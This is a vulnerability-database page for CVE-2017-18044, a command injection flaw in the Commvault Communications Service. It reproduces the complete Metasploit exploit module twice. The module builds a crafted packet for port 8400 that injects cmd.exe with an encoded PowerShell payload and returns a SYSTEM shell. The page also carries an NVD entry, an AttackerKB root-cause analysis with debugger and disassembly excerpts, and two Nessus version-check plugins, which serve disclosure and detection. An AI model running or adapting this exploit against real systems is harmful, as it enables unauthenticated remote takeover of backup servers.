Commvault Communications Service (cvd) Command Injection
2017-12-22T15:04:13
ID MSF:EXPLOIT/WINDOWS/MISC/COMMVAULT_CMD_EXEC Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a command injection vulnerability discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5 and v10). The vulnerability exists in the cvd.exe service and allows an attacker to execute arbitrary commands in the context of the service. By default, the Commvault Communications service installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability was discovered in the Windows version. The Linux version wasn't tested.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Commvault Communications Service (cvd) Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
and v10). The vulnerability exists in the cvd.exe service and allows an
attacker to execute arbitrary commands in the context of the service. By
default, the Commvault Communications service installs and runs as SYSTEM in
Windows and does not require authentication. This vulnerability was discovered
in the Windows version. The Linux version wasn't tested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
],
'References' =>
[
['CVE', '2017-18044'],
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
{
'Arch' => [ARCH_X64, ARCH_X86]
}
],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => '2017-12-12'))
register_options([Opt::RPORT(8400)])
end
def exploit
buf = build_exploit
print_status("Connecting to Commvault Communications Service.")
connect
print_status("Executing payload")
#Send the payload
sock.put(buf)
#Handle the shell
handler
disconnect
end
def build_exploit
#Get encoded powershell of payload
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
#Remove additional cmd.exe call
psh = "powershell"
idx = command.index(psh)
command = command[(idx)..-1]
#Build packet
cmd_path = 'C:\Windows\System32\cmd.exe'
msg_type = 9
zero = 0
payload = ""
payload += make_nops(8)
payload += [msg_type].pack('I>')
payload += make_nops(328)
payload += cmd_path
payload += ";"
payload += ' /c "'
payload += command
payload += '" && echo '
payload += "\x00"
payload += [zero].pack('I>')
#Add length header and payload
ret_data = [payload.length].pack('I>')
ret_data += payload
ret_data
end
end
{"id": "MSF:EXPLOIT/WINDOWS/MISC/COMMVAULT_CMD_EXEC", "type": "metasploit", "bulletinFamily": "exploit", "title": "Commvault Communications Service (cvd) Command Injection", "description": "This module exploits a command injection vulnerability discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5 and v10). The vulnerability exists in the cvd.exe service and allows an attacker to execute arbitrary commands in the context of the service. By default, the Commvault Communications service installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability was discovered in the Windows version. The Linux version wasn't tested.\n", "published": "2017-12-22T15:04:13", "modified": "2020-10-02T20:00:37", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18044", "https://www.securifera.com/advisories/sec-2017-0001/"], "cvelist": ["CVE-2017-18044"], "lastseen": "2020-10-14T07:56:07", "viewCount": 250, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2020-10-14T07:56:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-18044"]}, {"type": "attackerkb", "idList": ["AKB:9D676126-93A9-4EBE-AA98-AC235EE50529"]}, {"type": "nessus", "idList": ["COMMVAULT_11_SP7.NASL", "COMMVAULT_11_SP7_LOCAL.NASL"]}], "modified": "2020-10-14T07:56:07", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/commvault_cmd_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Commvault Communications Service (cvd) Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. The Linux version wasn't tested.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'b0yd', # @rwincey / Vulnerability Discovery and MSF module author\n ],\n 'References' =>\n [\n ['CVE', '2017-18044'],\n ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',\n {\n 'Arch' => [ARCH_X64, ARCH_X86]\n }\n ],\n ],\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-12-12'))\n\n register_options([Opt::RPORT(8400)])\n\n end\n\n def exploit\n\n buf = build_exploit\n print_status(\"Connecting to Commvault Communications Service.\")\n connect\n print_status(\"Executing payload\")\n #Send the payload\n sock.put(buf)\n #Handle the shell\n handler\n disconnect\n\n end\n\n\n def build_exploit\n\n #Get encoded powershell of payload\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')\n #Remove additional cmd.exe call\n psh = \"powershell\"\n idx = command.index(psh)\n command = command[(idx)..-1]\n\n #Build packet\n cmd_path = 'C:\\Windows\\System32\\cmd.exe'\n msg_type = 9\n zero = 0\n payload = \"\"\n payload += make_nops(8)\n payload += [msg_type].pack('I>')\n payload += make_nops(328)\n payload += cmd_path\n payload += \";\"\n payload += ' /c \"'\n payload += command\n payload += '\" && echo '\n payload += \"\\x00\"\n payload += [zero].pack('I>')\n\n #Add length header and payload\n ret_data = [payload.length].pack('I>')\n ret_data += payload\n\n ret_data\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T06:36:41", "description": "A Command Injection issue was discovered in ContentStore/Base/CVDataPipe.dll in Commvault before v11 SP6. A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon. This is a different vulnerability than CVE-2017-3195.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-19T17:29:00", "title": "CVE-2017-18044", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18044"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:commvault:commvault:11.0"], "id": "CVE-2017-18044", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18044", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:commvault:commvault:11.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp5:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp4:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-12-23T21:20:33", "bulletinFamily": "info", "cvelist": ["CVE-2017-18044"], "description": "A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:08pm UTC reported:\n\n## Introduction\n\nCommvault is a data protection and information management software; an enterprise-level data \nplatform that contains modules to back up, restore, archive, replicate, and search data.\n\nAccording to public documentation, the data is protected by installing agent software on the \nphysical or virtual hosts, which use the OS or application native APIs to protect data in a \nconsistent state. Production data is processed by the agent on client computers and backuped \nup through a data manager (the MediaAgent) to disk, tape, or cloud storage. All data \nmanagement activity in the environment is tracked by a centralized server (called CommServe), \nand can be managed by administrators through a central user interface. End users can access \nprotected data using web browsers or mobile devices.\n\nOne of the base services of Commvault is vulnerable to a remote command injection attack, \nspecifically the cvd service. It was a Metasploit submission by [@rwincey as PR #9340](<https://github.com/rapid7/metasploit-framework/pull/9340>).\n\n## Vulnerable Application\n\nAccording to the public advisory, Commvault v11 SP5 or prior are vulnerable to this \nvulnerability.\n\nThe specific vulnerable version I tested was 11.0.80.0, and the software was obtained from \nthe Metasploit contributor @rwincey. The software is available from our Google Drive at:\n\n**Vulnerable Apps \u2013> Commvault \u2013> Commvault_R80_SP5_22September16.exe**.\n\nThe version of the vulnerable DLL is:\n \n \n Image path: C:\\Program Files\\Commvault\\ContentStore\\Base\\CVDataPipe.dll\n Image name: CVDataPipe.dll\n Timestamp: Wed Dec 21 11:59:21 2016 (585AC2F9)\n CheckSum: 002ED404\n ImageSize: 002F0000\n File version: 11.80.50.60437\n Product version: 11.0.0.0\n File flags: 1 (Mask 3F) Debug\n File OS: 40004 NT Win32\n File type: 1.0 App\n File date: 00000000.00000000\n Translations: 0409.04b0\n CompanyName: Commvault\n ProductName: Commvault\n InternalName: CVDataPipe\n OriginalFilename: CVDataPipe.dll\n ProductVersion: 11.0.0.0\n FileVersion: 11.80.50.60437\n PrivateBuild:\n SpecialBuild:\n FileDescription:\n LegalCopyright: Copyright (c) 2000-2016\n LegalTrademarks:\n Comments:\n \n\n## Root Cause Analysis\n\nBased on the information we have from the pull request, the vulnerability is a command injection, so \nthat\u2019s where we begin reversing.\n\nUsually, there are two ways to execute a command in a C/C++ application, one of them is `WinExec()`, \nand the other one is `CreateProcess()`:\n \n \n BOOL WINAPI CreateProcess(\n _In_opt_ LPCTSTR lpApplicationName,\n _Inout_opt_ LPTSTR lpCommandLine,\n _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,\n _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,\n _In_ BOOL bInheritHandles,\n _In_ DWORD dwCreationFlags,\n _In_opt_ LPVOID lpEnvironment,\n _In_opt_ LPCTSTR lpCurrentDirectory,\n _In_ LPSTARTUPINFO lpStartupInfo,\n _Out_ LPPROCESS_INFORMATION lpProcessInformation\n );\n \n \n\nSince `CreateProcess()` is meant to replace `WinExec()` according to Microsoft, we can create a \nbreak point there fist in our debugger (WinDBG), and we hit it:\n \n \n 0:044> g\n Breakpoint 3 hit\n kernel32!CreateProcessA:\n 00000000`76fe8730 4c8bdc mov r11,rsp\n \n\nLooking at the callstack of this `kernel32!CreateProcessA`, we already have a pretty good idea \nlocating the vulnerability:\n \n \n 0:044> k\n Child-SP RetAddr Call Site\n 00000000`11a36b78 000007fe`f378a40f kernel32!CreateProcessA\n 00000000`11a36b80 000007fe`f377714e CVDataPipe!execCmd+0x7af\n 00000000`11a3f340 000007fe`f3777a69 CVDataPipe!CVDMessageHandler+0x78e\n 00000000`11a3fbd0 000007fe`f9cdc58d CVDataPipe!CVDMessageHandler+0x10a9\n 00000000`11a3fd40 000007fe`f9cdc1b1 CvBasicLib!CvThreadPool::th_defaultWorkerObj+0x3cd\n 00000000`11a3fe40 000007fe`f9cd2073 CvBasicLib!CvThreadPool::th_defaultWorker+0x51\n 00000000`11a3fe90 000007fe`f9a84f7f CvBasicLib!CvThread::~CvThread+0x63\n 00000000`11a3fee0 000007fe`f9a85126 MSVCR120!_callthreadstartex+0x17 [f:\\dd\\vctools\\crt\\crtw32\\startup\\threadex.c @ 376]\n 00000000`11a3ff10 00000000`76f6f56d MSVCR120!_threadstartex+0x102 [f:\\dd\\vctools\\crt\\crtw32\\startup\\threadex.c @ 354]\n 00000000`11a3ff40 00000000`770a3281 kernel32!BaseThreadInitThunk+0xd\n 00000000`11a3ff70 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\n \n\nThere are two things that are interesting. One of them is `CVDataPipe!CVDMessageHandler`, and the \nother one is `CVDataPipe!execCmd`.\n\n`CVDataPipe!CVDMessageHandler` is basically a function that handles our packet\u2019s message type. \nThe Metasploit exploit specifically sends a code of `9h`, which is the message type for `execCmd`:\n \n \n .text:0000000180147103 loc_180147103: ; CODE XREF: CVDMessageHandler(int,selectStruct_t *,CQiSocket,void *):loc_180146D78j\n .text:0000000180147103 lea rax, [rsp+888h+var_220] ; jumptable 0000000180146D78 case 9\n .text:000000018014710B mov [rsp+888h+var_600], rax\n .text:0000000180147113 mov rdx, [rsp+888h+sock]\n .text:000000018014711B mov rcx, [rsp+888h+var_600]\n .text:0000000180147123 call cs:??0CQiSocket@@QEAA@AEBV0@@Z ; CQiSocket::CQiSocket(CQiSocket const &)\n .text:0000000180147129 mov [rsp+888h+var_5F0], rax\n .text:0000000180147131 mov r8, [rsp+888h+arg_18]\n .text:0000000180147139 mov rdx, [rsp+888h+var_5F0]\n .text:0000000180147141 mov rcx, [rsp+888h+structSelect]\n .text:0000000180147149 call ?execCmd@@YAXPEAUselectStruct_t@@VCQiSocket@@PEAX@Z ; execCmd(selectStruct_t *,CQiSocket,void *)\n \n\nIf we take a closer look at the `execCmd` function, we can tell the purpose of it is for processes such as:\n\n * ifind (For restoring purposes) \n\n * BackupShadow.exe (For archiving) \n\n * Pub (Map file) \n\n * createIndex (A Commvault process for building index) \n\n \n \n .text:0000000180159F1B loc_180159F1B: ; CODE XREF: execCmd(selectStruct_t *,CQiSocket,void *)+261j\n .text:0000000180159F1B ; DATA XREF: .rdata:0000000180286258o\n .text:0000000180159F1B lea rdx, aIfind ; \"ifind\"\n .text:0000000180159F22 lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:0000000180159F2A call cs:strstr\n .text:0000000180159F30 test rax, rax\n .text:0000000180159F33 jnz short loc_180159F6D\n .text:0000000180159F35 lea rdx, aBackupshadow_e ; \"BackupShadow.exe\"\n .text:0000000180159F3C lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:0000000180159F44 call cs:strstr\n .text:0000000180159F4A test rax, rax\n .text:0000000180159F4D jnz short loc_180159F6D\n .text:0000000180159F4F lea rdx, aPub ; \"Pub\"\n .text:0000000180159F56 lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:0000000180159F5E call cs:strstr\n ...\n .text:000000018015A0BA loc_18015A0BA: ; CODE XREF: execCmd(selectStruct_t *,CQiSocket,void *)+307j\n .text:000000018015A0BA lea rdx, aCreateindex ; \"createIndex\"\n .text:000000018015A0C1 lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:000000018015A0C9 call cs:strstr\n .text:000000018015A0CF test rax, rax\n .text:000000018015A0D2 jz loc_18015A220\n \n\nHowever, if you don\u2019t call one of these processes, the `exeCmd` will assume you want to run your \ncustom process, and pass it to `CreateProcess` anyway:\n \n \n .text:000000018015A361 loc_18015A361: ; CODE XREF: execCmd(selectStruct_t *,CQiSocket,void *)+675j\n .text:000000018015A361 call cs:GetEnvironmentStrings\n .text:000000018015A367 mov [rsp+87B8h+var_86A8], rax\n .text:000000018015A36F lea rax, [rsp+87B8h+StartupInfo]\n .text:000000018015A377 mov rdi, rax\n .text:000000018015A37A xor eax, eax\n .text:000000018015A37C mov ecx, 68h\n .text:000000018015A381 rep stosb\n .text:000000018015A383 mov [rsp+87B8h+StartupInfo.cb], 68h\n .text:000000018015A38E lea rax, [rsp+87B8h+ProcessInformation]\n .text:000000018015A396 mov rdi, rax\n .text:000000018015A399 xor eax, eax\n .text:000000018015A39B mov ecx, 18h\n .text:000000018015A3A0 rep stosb\n .text:000000018015A3A2 mov [rsp+87B8h+StartupInfo.dwFlags], 1\n .text:000000018015A3AD xor eax, eax\n .text:000000018015A3AF mov [rsp+87B8h+StartupInfo.wShowWindow], ax\n .text:000000018015A3B7 lea rax, [rsp+87B8h+ProcessInformation]\n .text:000000018015A3BF mov [rsp+87B8h+lpProcessInformation], rax ; lpProcessInformation\n .text:000000018015A3C4 lea rax, [rsp+87B8h+StartupInfo]\n .text:000000018015A3CC mov [rsp+87B8h+lpStartupInfo], rax ; lpStartupInfo\n .text:000000018015A3D1 mov [rsp+87B8h+lpCurrentDirectory], 0 ; lpCurrentDirectory\n .text:000000018015A3DA mov [rsp+87B8h+lpEnvironment], 0 ; lpEnvironment\n .text:000000018015A3E3 mov [rsp+87B8h+dwCreationFlags], 10h ; dwCreationFlags\n .text:000000018015A3EB mov [rsp+87B8h+bInheritHandles], 0 ; bInheritHandles\n .text:000000018015A3F3 xor r9d, r9d ; lpThreadAttributes\n .text:000000018015A3F6 xor r8d, r8d ; lpProcessAttributes\n .text:000000018015A3F9 lea rdx, [rsp+87B8h+CommandLine] ; lpCommandLine\n .text:000000018015A401 lea rcx, [rsp+87B8h+ApplicationName] ; lpApplicationName\n .text:000000018015A409 call cs:CreateProcessA\n \n\nIt is unclear whether allowing an arbitrary custom process is intentional or not, it is unsafe \nanyway considering the cvd process binds to 0.0.0.0, so anybody can access to it.\n", "modified": "2020-10-19T00:00:00", "published": "2018-01-19T00:00:00", "id": "AKB:9D676126-93A9-4EBE-AA98-AC235EE50529", "href": "https://attackerkb.com/topics/nGwgS9snz5/cve-2017-18044---commvault-communications-service-execcmd-vulnerability", "type": "attackerkb", "title": "CVE-2017-18044 - Commvault Communications Service execCmd Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T01:41:27", "description": "The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. (CVE-2017-18044)", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-25T00:00:00", "title": "Commvault 11 < 11 SP7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18044", "CVE-2017-3195"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:commvault:commvault"], "id": "COMMVAULT_11_SP7_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/126988", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126988);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/08/12 17:35:39\");\n\n script_cve_id(\"CVE-2017-3195\",\"CVE-2017-18044\");\n script_bugtraq_id(96941);\n script_xref(name:\"IAVA\", value:\"2019-A-0181\");\n\n script_name(english:\"Commvault 11 < 11 SP7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for the product version and service pack.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Commvault install running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. (CVE-2017-18044)\");\n # https://www.securifera.com/advisories/cve-2017-18044/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f582085c\");\n # http://kb.commvault.com/article/SEC0013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7d23884\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Commvault v11 SP6 and install hotfix 590, v11 SP7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3195\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Commvault Communications Service (cvd) Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:commvault:commvault\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"commvault_win_installed.nbin\");\n script_require_keys(\"installed_sw/Commvault\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\napp_info = vcf::commvault::get_app_info_windows();\n\nconstraints = [{\"min_version\" : \"11\", \"fixed_version\": \"11.0.0.6.590\", \"fixed_display\":\"11 SP6 & hotfix 590 / 11 SP7\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:41:27", "description": "The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. (CVE-2017-18044)", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Commvault 11 < 11 SP7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18044", "CVE-2017-3195"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:commvault:commvault"], "id": "COMMVAULT_11_SP7.NASL", "href": "https://www.tenable.com/plugins/nessus/125782", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125782);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/07/25 7:07:22\");\n\n script_cve_id(\"CVE-2017-3195\",\"CVE-2017-18044\");\n script_bugtraq_id(96941);\n script_xref(name:\"IAVA\", value:\"2019-A-0181\");\n\n script_name(english:\"Commvault 11 < 11 SP7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for the product version and service pack.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Commvault install running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. (CVE-2017-18044)\");\n # https://www.securifera.com/advisories/cve-2017-18044/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f582085c\");\n # http://kb.commvault.com/article/SEC0013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7d23884\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Commvault v11 SP6 and install hotfix 590, v11 SP7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3195\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Commvault Communications Service (cvd) Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:commvault:commvault\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"commvault_web_console_detect.nbin\");\n script_require_keys(\"installed_sw/Commvault\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\n# Can't detect hotfix\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\n\n# get_app_info wrapper converts version string to <version>-SP<service pack>\n# for ease of writing constraints\napp = vcf::commvault::get_webapp_info(port:port);\n\nconstraints = [{\"min_version\" : \"11\", \"fixed_version\" : \"11-SP7\", \"fixed_display\":\"11 SP6 & hotfix 590 / 11 SP7\"}];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
